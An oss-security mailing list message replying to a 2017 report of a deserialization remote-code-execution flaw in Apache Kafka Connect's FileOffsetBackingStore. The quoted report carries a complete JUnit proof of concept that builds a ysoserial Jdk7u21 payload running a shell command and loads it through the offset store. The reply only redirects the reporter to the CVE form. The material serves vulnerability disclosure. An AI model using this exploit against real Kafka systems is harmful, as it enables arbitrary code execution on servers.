[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    Re: [oss-security] CVE-IDs request for Apache Kafka desrialization vulnerability via runtime
From:       Salvatore Bonaccorso <carnil () debian ! org>
Date:       2017-07-19 9:15:13
Message-ID: 20170719091513.7qubl5vw3a34jbvi () lorien ! valinor ! li
[Download RAW message or body]

On Wed, Jul 19, 2017 at 09:41:16AM +1000, Hooman Ghasem Broujerdi wrote:
> Hi,
> 
> Apache kafka connect-api runtime contains a desrialization vul via
> FileOffsetBackingStore
> which leads to remote code execution, this can be exploited reliably in
> JDK1.7.0_05, below is
> a unit test for it:
> 
> 
> import junit.framework.Test;
> import junit.framework.TestCase;
> import junit.framework.TestSuite;
> import org.apache.commons.io.FileUtils;
> import org.apache.kafka.connect.runtime.standalone.StandaloneConfig;
> import org.apache.kafka.connect.storage.FileOffsetBackingStore;
> import ysoserial.payloads.Jdk7u21;
> 
> import java.io.ByteArrayOutputStream;
> import java.io.File;
> import java.io.IOException;
> import java.io.ObjectOutputStream;
> import java.util.HashMap;
> import java.util.Map;
> 
> public void test_Kafka_Deser() throws Exception {
> 
>         StandaloneConfig config;
> 
>         String projectDir = System.getProperty("user.dir");
> 
>         Jdk7u21 jdk7u21 = new Jdk7u21();
>         Object o = jdk7u21.getObject("touch vul");
> 
>         byte[] ser = serialize(o);
> 
>         File tempFile = new File(projectDir + "/payload.ser");
>         FileUtils.writeByteArrayToFile(tempFile, ser);
> 
>         Map<String, String> props = new HashMap<String, String>();
>         props.put(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG,
> tempFile.getAbsolutePath());
>         props.put(StandaloneConfig.KEY_CONVERTER_CLASS_CONFIG,
> "org.apache.kafka.connect.json.JsonConverter");
>         props.put(StandaloneConfig.VALUE_CONVERTER_CLASS_CONFIG,
> "org.apache.kafka.connect.json.JsonConverter");
>         props.put(StandaloneConfig.INTERNAL_KEY_CONVERTER_CLASS_CONFIG,
> "org.apache.kafka.connect.json.JsonConverter");
>         props.put(StandaloneConfig.INTERNAL_VALUE_CONVERTER_CLASS_CONFIG,
> "org.apache.kafka.connect.json.JsonConverter");
>         config = new StandaloneConfig(props);
> 
>         FileOffsetBackingStore restore = new FileOffsetBackingStore();
>         restore.configure(config);
>         restore.start();
>     }
> 
>     private byte[] serialize(Object object) throws IOException {
>         ByteArrayOutputStream bout = new ByteArrayOutputStream();
>         ObjectOutputStream out = new ObjectOutputStream(bout);
>         out.writeObject(object);
>         out.flush();
>         return bout.toByteArray();
>     }

Thanks for reaching out the oss-security list. Unfortunately direct
CVE assignments cannot be request anymore through the list, rather
please fill the form at https://cveform.mitre.org/

Once you have the CVE assigned, can you please followup with the
assignement in this thread, so that other are informed about it?

Regards,
Salvatore
[prev in list] [next in list] [prev in thread] [next in thread]